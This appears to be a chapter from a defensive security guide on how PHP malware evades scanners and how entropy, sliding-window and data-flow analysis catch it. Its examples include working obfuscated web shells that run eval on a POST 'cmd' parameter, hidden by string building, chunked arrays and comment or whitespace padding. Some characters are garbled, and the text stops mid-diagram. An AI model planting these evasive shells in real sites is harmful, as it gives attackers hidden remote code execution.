Beyond signatures: How modern malware evades detection
In Chapter 4, we explored 87 malware signatures. You might think that’s enough to catch most threats. It’s not.
Modern attackers know what security scanners look for. They’ve studied signature databases, analyzed detection algorithms, and developed sophisticated techniques to fly under the radar. This chapter reveals those techniques - and how to defeat them.
The signature problem
Traditional scanners work like this:
1. Load signature database (patterns like "eval(base64_decode(")
2. Read each file
3. Match patterns against content
4. If match found → flag as malware
This approach has a fundamental flaw: attackers can read the same signature databases.
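The four steps above can be sketched in a few lines of PHP. This is a minimal illustration, not the scanner from Chapter 4: the `SIGNATURES` constant, its two patterns, and the `matchSignatures()` helper are hypothetical names chosen for the example.

```php
<?php
// Hypothetical mini signature database: name => PCRE pattern.
// Real databases are far larger; these two entries are illustrative only.
const SIGNATURES = [
    'eval_base64'  => '/eval\s*\(\s*base64_decode\s*\(/i',
    'assert_input' => '/assert\s*\(\s*\$_(GET|POST|REQUEST)/i',
];

/**
 * Return the names of all signatures that match the given file content.
 *
 * @return string[]
 */
function matchSignatures(string $content): array
{
    $hits = [];
    foreach (SIGNATURES as $name => $pattern) {
        if (preg_match($pattern, $content) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// The literal form is caught...
var_dump(matchSignatures("<?php eval(base64_decode('ZWNobyAiaGFja2VkIjs='));"));
// ...but one level of indirection slips past the same pattern.
var_dump(matchSignatures("<?php \$f = 'base64_decode'; eval(\$f('ZWNobyAiaGFja2VkIjs='));"));
```

The second call returns an empty list even though the code does the same thing, which is the weakness the rest of this chapter addresses.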
The Arms Race
Every public signature database is a roadmap for attackers. Each published signature tells them exactly which pattern to avoid, and a single signature can usually be sidestepped in several different ways. This is why signature-only scanners are fighting a losing battle.
What Attackers Do
When an attacker wants to evade eval(base64_decode( detection:
// Original (detected)
eval(base64_decode('ZWNobyAiaGFja2VkIjs='));
// Evasion v1: Variable indirection
// (eval is a language construct and cannot be called through a variable,
// so the attacker hides the decoder name instead; that alone breaks the signature)
$f = 'base64_decode';
eval($f('ZWNobyAiaGFja2VkIjs='));
// Evasion v2: String building
$func = 'bas'.'e64'.'_de'.'code';
eval($func('ZWNobyAiaGFja2VkIjs='));
// Evasion v3: Array chunks (defeats even v2 signatures)
$c = ['ZWNo', 'byAi', 'aGFj', 'a2Vk', 'Ijs='];
$f = implode('', array_map('chr', [98,97,115,101,54,52,95,100,101,99,111,100,101]));
eval($f(implode('', $c)));
Each version evades more signatures while doing the exact same thing. The behavior is identical; the appearance is different.
Enter entropy analysis
Entropy is a measure of randomness or unpredictability in data. It’s borrowed from information theory - specifically, Shannon entropy.
Understanding Entropy Intuitively
Think of entropy as measuring “surprise”:
- Low entropy (predictable): “AAAAAAAAAAAAAAAA” - no surprise, you know what comes next
- Medium entropy (structured): “function validateUser($id)” - has patterns but variety
- High entropy (random): “7hK9xQ2mL5nR8pT3” - each character is a surprise
Normal PHP code has medium entropy (4.5-5.5 on a 0-8 scale) because:
- Variable names follow conventions ($user, $request)
- Keywords repeat (function, return, if)
- Structure is predictable (indentation, brackets)
Base64-encoded malware has high entropy (5.8+) because:
- All 64 characters appear with similar frequency
- No recognizable patterns
- Looks like random gibberish
H(X) = -Σ p(x) × log₂(p(x))
Where:
- H(X) = entropy of the data
- p(x) = probability of character x appearing
- Σ = sum over all unique characters
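The formula translates almost directly into code. The sketch below is one possible implementation, working on bytes rather than Unicode characters; the function name `shannonEntropy()` is an assumption for illustration.

```php
<?php
/**
 * Shannon entropy of a byte string, in bits per byte (0.0 to 8.0).
 */
function shannonEntropy(string $data): float
{
    $length = strlen($data);
    if ($length === 0) {
        return 0.0;
    }

    $entropy = 0.0;
    // count_chars() mode 1 returns only the byte values that occur, with their counts.
    foreach (count_chars($data, 1) as $count) {
        $p = $count / $length;          // p(x)
        $entropy -= $p * log($p, 2);    // accumulate -p(x) * log2(p(x))
    }
    return $entropy;
}

printf("%.2f\n", shannonEntropy(str_repeat('A', 16)));           // one symbol only
printf("%.2f\n", shannonEntropy('function validateUser($id)'));  // structured text
printf("%.2f\n", shannonEntropy('7hK9xQ2mL5nR8pT3'));            // 16 distinct symbols
```

Note that a short string can never score higher than log₂ of its length: sixteen distinct characters give exactly 4 bits, so the thresholds quoted in this chapter only make sense for samples that are long enough.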
For a file with 256 unique byte values appearing equally:
H = -256 × (1/256 × log₂(1/256)) = 8 bits (maximum entropy)
Why Attackers Fear Entropy Scanners
Early entropy scanners caught obfuscated malware easily:
File: malicious.php
Global Entropy: 6.7 (HIGH - SUSPICIOUS)
→ Flag for review
But attackers adapted. They developed entropy evasion techniques - ways to artificially lower their malware’s entropy to look like normal code.
The 5 entropy evasion techniques
Through extensive research, we’ve identified five primary techniques attackers use to manipulate entropy:
| Technique | Method | Effect on Entropy |
|---|---|---|
| Comment Padding | Add voluminous repetitive comments | Lowers global entropy |
| Variable Name Engineering | Use predictable, long variable names | Lowers character diversity |
| Chunked Payload | Split payload into small pieces | Distributes high-entropy regions |
| String Steganography | Hide data in invisible characters | Adds entropy invisibly |
| Whitespace Manipulation | Add excessive whitespace | Dilutes entropy calculation |
Let’s examine each one in detail.
Technique 1: Comment padding
Goal: Dilute high-entropy payload with low-entropy comments.
<?php
/*
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* [... 500 more identical lines ...]
*/
// Configuration settings
// Configuration settings
// Configuration settings
$c = base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=');
eval($c);
/*
 * End of configuration file.
 * End of configuration file.
 * End of configuration file.
 * End of configuration file.
 */
Why it works: The malicious payload is 2 lines. The padding is 1000+ lines of repetitive, low-entropy text. The global entropy of the file drops from 6.5 to 4.8 - appearing normal.
Detection: CommentPaddingDetector
We counter this by comparing entropy with and without comments:
| Indicator | Threshold | What It Means |
|---|---|---|
| Entropy delta | > 1.5 | Big difference with/without comments |
| Comment ratio | > 60% | File is mostly comments |
| Repetition score | > 40% | Same lines repeated |
| Vocabulary ratio | < 15% | Very few unique words |
// Detection logic
$entropyWithComments = calculateEntropy($content);
$entropyWithout = calculateEntropy(stripComments($content));
$delta = $entropyWithout - $entropyWithComments;
if ($delta > 1.5) {
    // Comments are artificially lowering entropy
    // Investigate the non-comment code!
}
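The detection logic above relies on two helpers it does not define. A self-contained sketch follows, assuming comments are stripped with PHP's built-in tokenizer and entropy is measured per byte. The helper bodies and the `commentEntropyDelta()` name are illustrative assumptions, not the detector's actual code.

```php
<?php
/** Shannon entropy of a byte string, in bits per byte. */
function calculateEntropy(string $data): float
{
    $length = strlen($data);
    if ($length === 0) {
        return 0.0;
    }
    $entropy = 0.0;
    foreach (count_chars($data, 1) as $count) {
        $p = $count / $length;
        $entropy -= $p * log($p, 2);
    }
    return $entropy;
}

/** Remove comments using the tokenizer (T_COMMENT and T_DOC_COMMENT tokens). */
function stripComments(string $source): string
{
    $out = '';
    foreach (token_get_all($source) as $token) {
        if (is_array($token)) {
            if ($token[0] === T_COMMENT || $token[0] === T_DOC_COMMENT) {
                continue; // drop the comment text entirely
            }
            $out .= $token[1];
        } else {
            $out .= $token; // single-character tokens such as ";" or "("
        }
    }
    return $out;
}

/** Positive values mean the comments are pulling the global entropy down. */
function commentEntropyDelta(string $source): float
{
    return calculateEntropy(stripComments($source)) - calculateEntropy($source);
}

// Build a padded sample: 500 identical comment lines in front of a short payload.
$padding = str_repeat(" * This is a legitimate configuration file for the application.\n", 500);
$sample  = "<?php\n/*\n{$padding} */\n\$c = base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=');\neval(\$c);\n";

printf("with comments:    %.2f\n", calculateEntropy($sample));
printf("without comments: %.2f\n", calculateEntropy(stripComments($sample)));
printf("delta:            %.2f\n", commentEntropyDelta($sample));
```

Using the tokenizer rather than a regular expression avoids mistaking `//` inside a string literal for a comment.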
Real Detection Numbers
In our implementation, we require at least 2 indicators with combined confidence above 40% before flagging. This prevents false positives on legitimately well-documented code.
Technique 2: Variable name engineering
Goal: Use predictable, long variable names to lower character diversity.
<?php
$temporaryDataBufferStorageVariableOne = 'ZX';
$temporaryDataBufferStorageVariableTwo = 'Zh';
$temporaryDataBufferStorageVariableThree = 'bC';
$temporaryDataBufferStorageVariableFour = 'gk';
$temporaryDataBufferStorageVariableFive = 'X1';
$temporaryDataBufferStorageVariableSix = 'BP';
$temporaryDataBufferStorageVariableSeven = 'U1';
$temporaryDataBufferStorageVariableEight = 'Rb';
$temporaryDataBufferStorageVariableNine = 'J2';
$temporaryDataBufferStorageVariableTen = 'Nt';
$resultOutputDataString =
$temporaryDataBufferStorageVariableOne .
$temporaryDataBufferStorageVariableTwo .
$temporaryDataBufferStorageVariableThree .
/* ... continues ... */;
$decodeFunctionVariable = 'base64_decode';
// eval is a language construct and cannot be called through a variable
eval($decodeFunctionVariable($resultOutputDataString));
Why it works: The long, repetitive variable names add predictable characters. Words like “temporary”, “Data”, “Buffer”, “Storage”, “Variable” appear constantly, lowering entropy.
Detection: VariableNameEngineeringDetector
| Indicator | Threshold | What It Means |
|---|---|---|
| Average length | > 25 chars | Unusually long variable names |
| Very long count | > 3 variables over 40 chars | Padding behavior |
| Sequential patterns | > 5 numbered vars | $var1, $var2, $var3… |
| Repetitive affixes | > 40% same suffix/prefix | Same endings/beginnings |
Known padding words we look for:
data, buffer, temp, var, string, value, content, result, output, input, param, arg, item, element
When these words appear repeatedly in variable names, suspicion increases.
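As a rough sketch of how two of these indicators could be measured, the function below extracts variable names with a regular expression and reports their average length and the number of padding-word hits. The `variableNameStats()` name and its return shape are assumptions for illustration. A real detector would more likely walk tokenizer output and would also cover the sequential and affix checks.

```php
<?php
// Padding words taken from the list above.
const PADDING_WORDS = ['data', 'buffer', 'temp', 'var', 'string', 'value', 'content',
    'result', 'output', 'input', 'param', 'arg', 'item', 'element'];

/**
 * Collect simple statistics about the distinct variable names in PHP source.
 *
 * @return array{count:int, avgLength:float, paddingHits:int}
 */
function variableNameStats(string $source): array
{
    preg_match_all('/\$([A-Za-z_][A-Za-z0-9_]*)/', $source, $m);
    $names = array_values(array_unique($m[1]));
    if ($names === []) {
        return ['count' => 0, 'avgLength' => 0.0, 'paddingHits' => 0];
    }

    $paddingHits = 0;
    foreach ($names as $name) {
        foreach (PADDING_WORDS as $word) {
            // Each padding word counts at most once per variable name.
            if (stripos($name, $word) !== false) {
                $paddingHits++;
            }
        }
    }

    return [
        'count'       => count($names),
        'avgLength'   => (float) (array_sum(array_map('strlen', $names)) / count($names)),
        'paddingHits' => $paddingHits,
    ];
}

$stats = variableNameStats(
    '$temporaryDataBufferStorageVariableOne = "ZX"; $temporaryDataBufferStorageVariableTwo = "Zh";'
);
print_r($stats);
// The 25-character threshold comes from the indicator table above.
echo $stats['avgLength'] > 25 ? "suspicious\n" : "ok\n";
```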
Technique 3: Chunked payload distribution
Goal: Break high-entropy payload into small chunks that individually appear normal.
<?php
// Looks like configuration data
$config = [];
$config[] = 'ZX';
$config[] = 'Zh';
$config[] = 'bC';
$config[] = 'gk';
$config[] = 'X1';
$config[] = 'BP';
$config[] = 'U1';
$config[] = 'RF';
$config[] = 'J2';
$config[] = 'Nt';
$config[] = 'ZC';
$config[] = 'dd';
$config[] = 'XS';
$config[] = 'k7';
// Reconstruction - the dangerous part
$payload = implode('', $config);
$fn = chr(98).chr(97).chr(115).chr(101).'64_'.chr(100).chr(101).'code'; // "base64_decode"
eval($fn($payload)); // eval is a language construct, so only the decoder name can be hidden this way
Why it works: Each 2-character chunk has low entropy. A sliding window of 256 bytes won’t see a concentrated high-entropy region. The payload is distributed across the file.
Detection: ChunkedPayloadDetector
We look for the reconstruction patterns:
| Pattern | Description | Confidence |
|---|---|---|
| Array building | $arr[] = 'xx'; repeated | 70% |
| implode + eval | Reconstruction into execution | 95% |
| implode + base64_decode | Decoding reconstructed string | 90% |
| chr() chains | Building strings from ASCII | 85% |
| Uniform string lengths | All strings same size | 70% |
// Key detection patterns
$dangerousReconstruction = [
    'base64_chunks' => '/base64_decode\s*\(\s*implode/',
    'gzinflate_chunks' => '/gzinflate\s*\(\s*implode/',
    'chr_building' => '/chr\s*\(\s*\d+\s*\)\s*\.\s*chr/',
];
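To show how these patterns might be applied, the sketch below runs them against a source string and also counts appends of very short string literals. The `findReconstruction()` function and the short-append regex are hypothetical additions for illustration; only the three named patterns come from the listing above.

```php
<?php
// The three patterns from the listing above.
const RECONSTRUCTION_PATTERNS = [
    'base64_chunks'    => '/base64_decode\s*\(\s*implode/',
    'gzinflate_chunks' => '/gzinflate\s*\(\s*implode/',
    'chr_building'     => '/chr\s*\(\s*\d+\s*\)\s*\.\s*chr/',
];

/**
 * @return array{patterns: string[], shortAppends: int}
 */
function findReconstruction(string $source): array
{
    $matched = [];
    foreach (RECONSTRUCTION_PATTERNS as $name => $pattern) {
        if (preg_match($pattern, $source) === 1) {
            $matched[] = $name;
        }
    }

    // Hypothetical extra signal: appends of 1-4 character base64-looking
    // literals, e.g. $config[] = 'ZX';
    $shortAppends = preg_match_all(
        '/\$\w+\s*\[\s*\]\s*=\s*([\'"])[A-Za-z0-9+\/=]{1,4}\1\s*;/',
        $source
    );

    return ['patterns' => $matched, 'shortAppends' => (int) $shortAppends];
}

$sample = <<<'PHP'
$config = [];
$config[] = 'ZX';
$config[] = 'Zh';
$config[] = 'bC';
$payload = base64_decode(implode('', $config));
$fn = chr(115).chr(121).chr(115);
PHP;

print_r(findReconstruction($sample));
```

One caveat: these patterns only match when `implode` is nested directly inside the decoder call. If the attacker assigns the `implode()` result to a variable first, a pure regex check misses it, which is one more argument for the data-flow approach discussed later in this chapter.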
AI Polymorphism Uses This
AI-generated malware heavily uses chunked payloads because each instance can have a different chunk order, different array variable names, and different reconstruction methods. This is why we focus on detecting the reconstruction, not the chunks themselves.
Technique 4: String steganography
Goal: Hide data using invisible Unicode characters or look-alike characters.
Invisible Characters
These Unicode characters are invisible but present in the string:
| Character (PHP escape) | Unicode | Name |
|---|---|---|
| \u{200B} | U+200B | Zero Width Space |
| \u{200C} | U+200C | Zero Width Non-Joiner |
| \u{200D} | U+200D | Zero Width Joiner |
| \u{FEFF} | U+FEFF | Byte Order Mark |
| \u{00AD} | U+00AD | Soft Hyphen |
| \u{2060} | U+2060 | Word Joiner |
<?php
// Looks like a normal string, but contains hidden data
// (encoding assumed here for illustration: U+200B = 0, U+200C = 1)
$message = "Hello\u{200B}\u{200C}\u{200B}\u{200B}\u{200C}\u{200B}\u{200B}\u{200B}World"; // zero-width patterns encode binary
// Decoder extracts binary from invisible char positions
$binary = '';
for ($i = 0; $i < mb_strlen($message); $i++) {
    $char = mb_substr($message, $i, 1);
    if ($char === "\u{200B}") $binary .= '0';
    if ($char === "\u{200C}") $binary .= '1';
}
// $binary could be: "01001000" = 'H' = start of payload
Homoglyphs
Characters from different scripts that look identical:
| Latin | Cyrillic | They Look The Same |
|---|---|---|
| a | Π° | Yes |
| e | Π΅ | Yes |
| o | ΠΎ | Yes |
| c | Ρ | Yes |
| p | Ρ | Yes |
An attacker could write Π΅val (Cyrillic βΠ΅β) instead of eval (Latin βeβ). Signature scanners looking for eval wonβt match, but PHP might still execute it.
Detection: StringSteganographyDetector
We scan for:
- Invisible characters - Any ZWSP, ZWNJ, BOM, etc.
- Homoglyph mixing - Cyrillic in otherwise Latin text
- Mixed scripts - Latin + Cyrillic + Greek in same string
- Non-printable characters - Control characters hidden in strings
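The first two checks can be sketched with PCRE's Unicode support. The function name `scanForSteganography()` and its return shape are assumptions for illustration. The invisible-character class lists exactly the six code points from the table earlier in this section.

```php
<?php
/**
 * Count invisible characters and detect words that mix Latin and Cyrillic.
 *
 * @return array{invisible:int, mixedScript:bool}
 */
function scanForSteganography(string $text): array
{
    // Zero-width and formatting characters from the table in this section.
    $invisible = preg_match_all(
        '/[\x{200B}\x{200C}\x{200D}\x{FEFF}\x{00AD}\x{2060}]/u',
        $text
    );

    // A single word containing both Latin and Cyrillic letters is a strong homoglyph hint.
    $mixed = false;
    if (preg_match_all('/\p{L}+/u', $text, $words)) {
        foreach ($words[0] as $word) {
            if (preg_match('/\p{Latin}/u', $word) && preg_match('/\p{Cyrillic}/u', $word)) {
                $mixed = true;
                break;
            }
        }
    }

    return ['invisible' => (int) $invisible, 'mixedScript' => $mixed];
}

print_r(scanForSteganography("Hello\u{200B}\u{200C}World")); // two zero-width characters
print_r(scanForSteganography("\u{0435}val(\$code);"));        // Cyrillic "е" + Latin "val"
print_r(scanForSteganography('eval($code);'));                 // plain Latin
```

A legitimate byte order mark at the very start of a file would also be counted here, so a production check would probably ignore U+FEFF at offset zero.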
Technique 5: Whitespace manipulation
Goal: Pad file with whitespace to dilute entropy.
<?php
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
Why it works: Whitespace characters (space, tab, newline) have low entropy because they’re all similar. Adding 90% whitespace drops global entropy significantly.
Detection: WhitespaceManipulationDetector
| Indicator | Threshold | Meaning |
|---|---|---|
| Whitespace ratio | > 40% | File is mostly whitespace |
| Entropy delta | > 2.0 | Big difference with/without whitespace |
| Blank line ratio | > 30% | Too many empty lines |
| Consecutive blanks | > 10 | Suspicious padding |
| Low entropy regions | > 3 windows | Concentrated whitespace areas |
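The first two indicators in the table can be computed as follows. This is a sketch under the assumption that entropy is measured per byte and that "whitespace" means anything matched by `\s`; the function names are illustrative.

```php
<?php
/** Shannon entropy of a byte string, in bits per byte. */
function shannonEntropy(string $data): float
{
    $length = strlen($data);
    if ($length === 0) {
        return 0.0;
    }
    $entropy = 0.0;
    foreach (count_chars($data, 1) as $count) {
        $p = $count / $length;
        $entropy -= $p * log($p, 2);
    }
    return $entropy;
}

/**
 * Whitespace ratio and the entropy gained by removing all whitespace.
 *
 * @return array{ratio:float, delta:float}
 */
function whitespaceIndicators(string $source): array
{
    $length = strlen($source);
    if ($length === 0) {
        return ['ratio' => 0.0, 'delta' => 0.0];
    }
    $stripped = (string) preg_replace('/\s+/', '', $source);

    return [
        'ratio' => ($length - strlen($stripped)) / $length,
        'delta' => shannonEntropy($stripped) - shannonEntropy($source),
    ];
}

// The payload is held in a string only; nothing here is executed.
$payload = "<?php eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));";
$padded  = $payload . str_repeat("\n", 2000) . str_repeat(' ', 2000);

$result = whitespaceIndicators($padded);
printf("whitespace ratio: %.0f%%\n", $result['ratio'] * 100);
printf("entropy delta:    %.2f\n", $result['delta']);
```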
The power of sliding window analysis
Global entropy can be manipulated. Local entropy is harder to fake.
Sliding window analysis divides a file into overlapping chunks and measures each one’s entropy:
File: malicious_padded.php (10000 bytes)
Sliding Window Configuration:
- Window size: 256 bytes
- Step: 64 bytes
- Windows analyzed: ~155
Results:
Window 0-256: Entropy 3.2 (comments/padding)
Window 64-320: Entropy 3.4 (comments/padding)
Window 128-384: Entropy 3.5 (comments/padding)
...
Window 4096-4352: Entropy 6.8 ← ANOMALY! Hidden payload
Window 4160-4416: Entropy 6.7 ← ANOMALY!
...
Window 9800-10000: Entropy 3.1 (comments/padding)
Global Entropy: 4.2 (appears normal)
But: Local anomalies detected at byte 4096-4500
The global entropy looks normal (4.2), but the sliding window reveals a high-entropy region in the middle - that’s where the malicious payload is hidden.
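A minimal sketch of the windowing step, using the 256-byte window and 64-byte step from the configuration above. The `windowEntropies()` function is a hypothetical name, and the synthetic file is built only to show the effect; its numbers will not match the sample report.

```php
<?php
/** Shannon entropy of a byte string, in bits per byte. */
function shannonEntropy(string $data): float
{
    $length = strlen($data);
    if ($length === 0) {
        return 0.0;
    }
    $entropy = 0.0;
    foreach (count_chars($data, 1) as $count) {
        $p = $count / $length;
        $entropy -= $p * log($p, 2);
    }
    return $entropy;
}

/**
 * Entropy of each full-size window, sliding by $step bytes.
 *
 * @return array<int, array{offset:int, entropy:float}>
 */
function windowEntropies(string $data, int $size = 256, int $step = 64): array
{
    $windows = [];
    $last = max(0, strlen($data) - $size);
    for ($offset = 0; $offset <= $last; $offset += $step) {
        $windows[] = [
            'offset'  => $offset,
            'entropy' => shannonEntropy(substr($data, $offset, $size)),
        ];
    }
    return $windows;
}

// Synthetic file: repetitive padding with a base64 blob of random bytes in the middle.
$padding = str_repeat("// Configuration settings\n", 200);
$blob    = base64_encode(random_bytes(512));
$file    = $padding . $blob . $padding;

$windows = windowEntropies($file);
$peak    = max(array_column($windows, 'entropy'));

printf(
    "windows: %d, global: %.2f, peak window: %.2f\n",
    count($windows),
    shannonEntropy($file),
    $peak
);
```

The peak window sits well above the global figure because the padding no longer dilutes it, which is what makes this view harder to fake than a single file-wide number.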
Z-Score Anomaly Detection
We use statistical z-scores to find outliers:
// Calculate mean and standard deviation of all windows
$mean = average($windowEntropies);
$stdDev = standardDeviation($windowEntropies);
// Any window more than 2 standard deviations from mean is anomalous
// (skip the check when all windows are identical, to avoid dividing by zero)
foreach ($windows as $window) {
    if ($stdDev == 0) {
        break;
    }
    $zScore = abs($window['entropy'] - $mean) / $stdDev;
    if ($zScore > 2.0) {
        // This region is statistically abnormal
        flagAsAnomaly($window);
    }
}
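The snippet above assumes helper functions for the mean and standard deviation. A self-contained version might look like the sketch below. The `zScoreOutliers()` name is hypothetical, and the use of the population standard deviation (dividing by n) is an assumption, since the text does not say which variant is used.

```php
<?php
/**
 * Return the indexes of values whose z-score exceeds the threshold.
 *
 * @param float[] $values
 * @return int[]
 */
function zScoreOutliers(array $values, float $threshold = 2.0): array
{
    $n = count($values);
    if ($n < 2) {
        return [];
    }

    $mean     = array_sum($values) / $n;
    $variance = array_sum(array_map(fn ($v) => ($v - $mean) ** 2, $values)) / $n;
    $stdDev   = sqrt($variance);
    if ($stdDev == 0.0) {
        return []; // all windows identical: nothing stands out
    }

    $outliers = [];
    foreach ($values as $i => $value) {
        if (abs($value - $mean) / $stdDev > $threshold) {
            $outliers[] = $i;
        }
    }
    return $outliers;
}

// Window entropies: mostly padding, with one high-entropy window at index 8.
$entropies = [3.2, 3.4, 3.5, 3.3, 3.1, 3.4, 3.2, 3.3, 6.8, 3.2, 3.1, 3.4];
print_r(zScoreOutliers($entropies)); // only index 8 is reported
```

Because the test uses the absolute value, unusually low-entropy windows are flagged as well. That can be useful for spotting padding, but it is worth keeping the direction of each anomaly when reporting.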
Behavioral analysis: The future
Signatures tell us what code looks like. Behavioral analysis tells us what code does.
The Key Insight
No matter how an attacker obfuscates eval($_POST['cmd']), the behavior
is the same: user input flows to a code execution function. We should detect
the flow, not the appearance.
Data Flow Tracking
Instead of pattern matching, we track how data moves:
User Input Source  →  Transformation  →  Dangerous Sink
──────────────────────────────────────────────────────
$_GET['x']         →  base64_decode   →  eval()
$_POST['data']     →  decrypt()       →  unserialize()
$_REQUEST['cmd']   →  (none)          →  system()
$_COOKIE['token']  →  gzinflate()     →  assert()
If data flows from any user input to any dangerous sink, we flag it - regardless of how the code looks.
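To make the idea concrete, here is a deliberately tiny taint tracker. It is a sketch under heavy assumptions: it splits on semicolons, ignores scopes and control flow, and knows only a short hypothetical list of sources and sinks. A production implementation would work on a parsed syntax tree instead. All names in the block are illustrative.

```php
<?php
const SOURCE_PATTERN = '/\$_(GET|POST|REQUEST|COOKIE)\b/';
const SINK_PATTERN   = '/\b(eval|assert|system|exec|passthru|shell_exec|unserialize)\s*\(/i';

/**
 * Statement-by-statement taint tracking.
 *
 * @return string[] statements in which user-controlled data reaches a sink
 */
function findTaintedSinks(string $source): array
{
    $tainted  = []; // variable name => true for variables carrying user input
    $findings = [];

    foreach (explode(';', $source) as $statement) {
        $statement = trim($statement);
        if ($statement === '') {
            continue;
        }

        // Split simple assignments ($var = expr) into target and expression.
        $target = null;
        $expr   = $statement;
        if (preg_match('/^\$(\w+)\s*=(?!=)\s*(.*)$/s', $statement, $m) === 1) {
            $target = $m[1];
            $expr   = $m[2];
        }

        // The expression is tainted if it reads a source or a tainted variable.
        $usesTaint = preg_match(SOURCE_PATTERN, $expr) === 1;
        foreach (array_keys($tainted) as $name) {
            if (preg_match('/\$' . preg_quote((string) $name, '/') . '\b/', $expr) === 1) {
                $usesTaint = true;
            }
        }

        if ($usesTaint && preg_match(SINK_PATTERN, $expr) === 1) {
            $findings[] = $statement;
        }

        // Propagate or clear taint on the assigned variable.
        if ($target !== null) {
            if ($usesTaint) {
                $tainted[$target] = true;
            } else {
                unset($tainted[$target]);
            }
        }
    }

    return $findings;
}

$sample = <<<'PHP'
$a = $_GET['x'];
$b = base64_decode($a);
eval($b);
$c = 'static';
system($c);
PHP;

print_r(findTaintedSinks($sample)); // reports eval($b) but not system($c)
```

Renaming `$a` and `$b`, or swapping `base64_decode` for another transformation, does not change the result, because the check follows the data rather than the spelling.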
Why This Defeats AI Polymorphism
AI-generated malware changes its appearance every 15-60 seconds:
- Variable names randomized
- Function order shuffled
- String encoding varies
- Comment patterns change
But the behavior stays the same. The malware still needs to:
- Receive attacker commands (input)
- Execute those commands (sink)
Behavioral analysis catches any variant that changes only its appearance, because the flow from input to sink is still there.
Weighted scoring: Combining everything
No single technique is perfect. We combine multiple signals:
| Component | Weight | What It Measures |
|---|---|---|
| Signature matches | 35% | Known malware patterns |
| Behavioral analysis | 25% | Data flow to dangerous sinks |
| Entropy analysis | 15% | Statistical anomalies |
| Structural analysis | 10% | Code structure oddities |
| Context analysis | 15% | File location, naming |
Context Modifiers
Not all detections are equal. We adjust scores based on context:
| Context | Modifier | Reason |
|---|---|---|
| vendor/ | -40% | Third-party code, expected patterns |
| storage/framework/views/ | -50% | Compiled Blade templates |
| bootstrap/cache/ | -45% | Framework cache files |
| public/uploads/ | +40% | PHP shouldn’t be here |
| .hidden/ | +35% | Suspicious directory |
| Random filename | +20% | x7kd92.php is suspicious |
Confidence Thresholds
Based on final score, we recommend actions:
| Confidence | Action | Automated? |
|---|---|---|
| ≥ 85% | QUARANTINE - Move to isolation, alert admin | Yes |
| 65-84% | REVIEW - Flag for manual inspection | No |
| 40-64% | MONITOR - Add to watchlist | No |
| < 40% | CLEAN - No action needed | - |
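The three tables above can be combined into a small scoring routine. The sketch below makes several assumptions that the text does not spell out: each component reports a score between 0 and 1, a context modifier scales the weighted sum multiplicatively, only path-prefix modifiers are handled (the random-filename rule is omitted), and the result is clamped to the 0-1 range. Function names and sample paths are hypothetical.

```php
<?php
// Component weights from the weighted scoring table.
const WEIGHTS = [
    'signature'  => 0.35,
    'behavioral' => 0.25,
    'entropy'    => 0.15,
    'structural' => 0.10,
    'context'    => 0.15,
];

// Path-prefix modifiers from the context modifier table.
const CONTEXT_MODIFIERS = [
    'vendor/'                  => -0.40,
    'storage/framework/views/' => -0.50,
    'bootstrap/cache/'         => -0.45,
    'public/uploads/'          => 0.40,
    '.hidden/'                 => 0.35,
];

/** Weighted sum of component scores, adjusted for file location. */
function finalScore(array $componentScores, string $path): float
{
    $score = 0.0;
    foreach (WEIGHTS as $name => $weight) {
        $score += $weight * ($componentScores[$name] ?? 0.0);
    }

    foreach (CONTEXT_MODIFIERS as $prefix => $modifier) {
        if (strpos($path, $prefix) === 0) {
            $score *= 1.0 + $modifier; // assumption: modifiers scale the score
            break;
        }
    }

    return max(0.0, min(1.0, $score));
}

/** Map a final score to the recommended action. */
function recommend(float $score): string
{
    if ($score >= 0.85) {
        return 'QUARANTINE';
    }
    if ($score >= 0.65) {
        return 'REVIEW';
    }
    if ($score >= 0.40) {
        return 'MONITOR';
    }
    return 'CLEAN';
}

$signals = ['signature' => 0.9, 'behavioral' => 1.0, 'entropy' => 0.6, 'structural' => 0.3, 'context' => 0.5];
foreach (['public/uploads/x7kd92.php', 'app/Http/Helper.php', 'vendor/acme/lib.php'] as $path) {
    $score = finalScore($signals, $path);
    printf("%-28s %.2f %s\n", $path, $score, recommend($score));
}
```

With these sample signals, the same findings lead to QUARANTINE under public/uploads/, REVIEW in application code, and MONITOR under vendor/, which shows how much location shifts the outcome.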
The 15-dimensional feature vector
For advanced analysis, we compute 15 statistical features:
Entropy Features (3)
- Global entropy
- Entropy variance across windows
- Entropy range (max - min)
Character Distribution (4)
- Printable character ratio
- Alphabetic ratio
- Digit ratio
- Special character ratio
Code Metrics (3)
- Average line length
- Maximum line length
- Blank line ratio
String Analysis (2)
- Long string count (strings over 100 chars)
- Base64 likelihood score
Function Analysis (3)
- Dangerous function count
- Obfuscation indicator count
- Variable function call count
This 15-dimensional vector provides a fingerprint of the file that’s difficult to manipulate without changing actual behavior.
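As an illustration, the sketch below computes seven of the fifteen features: the four character-distribution ratios and the three code metrics. The exact definitions are assumptions, since the chapter lists the features without defining them. In particular, "special character" is taken here to mean any byte that is neither alphanumeric nor whitespace.

```php
<?php
/**
 * Character-distribution and code-metric features (7 of the 15).
 *
 * @return array<string, float|int>
 */
function partialFeatureVector(string $source): array
{
    $length      = max(1, strlen($source)); // avoid division by zero on empty input
    $lines       = explode("\n", $source);
    $lineLengths = array_map('strlen', $lines);
    $blankLines  = count(array_filter($lines, fn ($line) => trim($line) === ''));

    return [
        'printable_ratio'  => preg_match_all('/[\x20-\x7E]/', $source) / $length,
        'alphabetic_ratio' => preg_match_all('/[A-Za-z]/', $source) / $length,
        'digit_ratio'      => preg_match_all('/[0-9]/', $source) / $length,
        'special_ratio'    => preg_match_all('/[^A-Za-z0-9\s]/', $source) / $length,
        'avg_line_length'  => array_sum($lineLengths) / count($lines),
        'max_line_length'  => (float) max($lineLengths),
        'blank_line_ratio' => $blankLines / count($lines),
    ];
}

print_r(partialFeatureVector("<?php\n\n\$user = getUser(\$id);\nreturn \$user;\n"));
```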
Practical implementation
Here’s how our detection pipeline works:
Input: suspicious.php
               │
               ▼
┌─────────────────────────────┐
│ 1. Quick Filters            │  Skip: >1MB, non-PHP, vendor/
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│ 2. Signature Scan           │  87 patterns from Chapter 4
